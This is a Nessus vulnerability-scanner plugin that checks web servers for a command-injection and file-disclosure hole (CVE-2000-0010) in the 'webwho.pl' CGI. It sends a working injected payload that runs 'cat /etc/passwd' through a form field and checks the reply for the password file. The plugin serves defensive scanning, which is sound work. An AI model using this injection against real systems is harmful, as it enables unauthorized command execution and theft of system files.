home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / webwho_pl.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  71 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(11333);
  10.  script_bugtraq_id(892);
  11.  script_version ("$Revision: 1.5 $");
  12.  script_cve_id("CVE-2000-0010");
  13.  
  14.  name["english"] = "webwho plus";
  15.  
  16.  script_name(english:name["english"]);
  17.  
  18.  desc["english"] = "The CGI 'webwho+' allows an attacker
  19. to view any file on the target computer, as well as execute
  20. arbitrary commands. 
  21.  
  22. Solution : Upgrade to a newer version.
  23.  
  24. Risk factor : High
  25. ";
  26.  
  27.  
  28.  
  29.  script_description(english:desc["english"]);
  30.  
  31.  summary["english"] = "Checks if webwho.pl is vulnerable";
  32.  
  33.  script_summary(english:summary["english"]);
  34.  
  35.  script_category(ACT_GATHER_INFO);
  36.  
  37.  
  38.  script_copyright(english:"This script is Copyright (C) 2003 Renaud Deraison",
  39.         francais:"Ce script est Copyright (C) 2003 Renaud Deraison");
  40.  family["english"] = "CGI abuses";
  41.  family["francais"] = "Abus de CGI";
  42.  script_family(english:family["english"], francais:family["francais"]);
  43.  script_dependencie("find_service.nes", "no404.nasl", "httpver.nasl");
  44.   script_require_ports("Services/www", 80);
  45.  exit(0);
  46. }
  47.  
  48. #
  49. # The script code starts here
  50. #
  51.  
  52. include("http_func.inc");
  53. include("http_keepalive.inc");
  54.  
  55.  
  56. port = get_http_port(default:80);
  57.  
  58. if(!get_port_state(port))exit(0);
  59.  
  60. foreach dir (cgi_dirs())
  61. {
  62.  cmd = 'command=X&type="echo foo;cat /etc/passwd;echo foo&Check=X';
  63.  req = http_post(item:string(dir, "/webwho.pl"), port:port);
  64.  idx = stridx(req, string("\r\n\r\n"));
  65.  req = insstr(req, string("\r\nContent-Length: ", strlen(cmd), "\r\n\r\n"), idx);
  66.  req = string(req, cmd);
  67.  result = http_keepalive_send_recv(port:port, data:req);
  68.  if(result == NULL) exit(0);
  69.  if(egrep(pattern:".*root:.*:0:[01]:.*", string:result))security_hole(port);
  70. }
  71.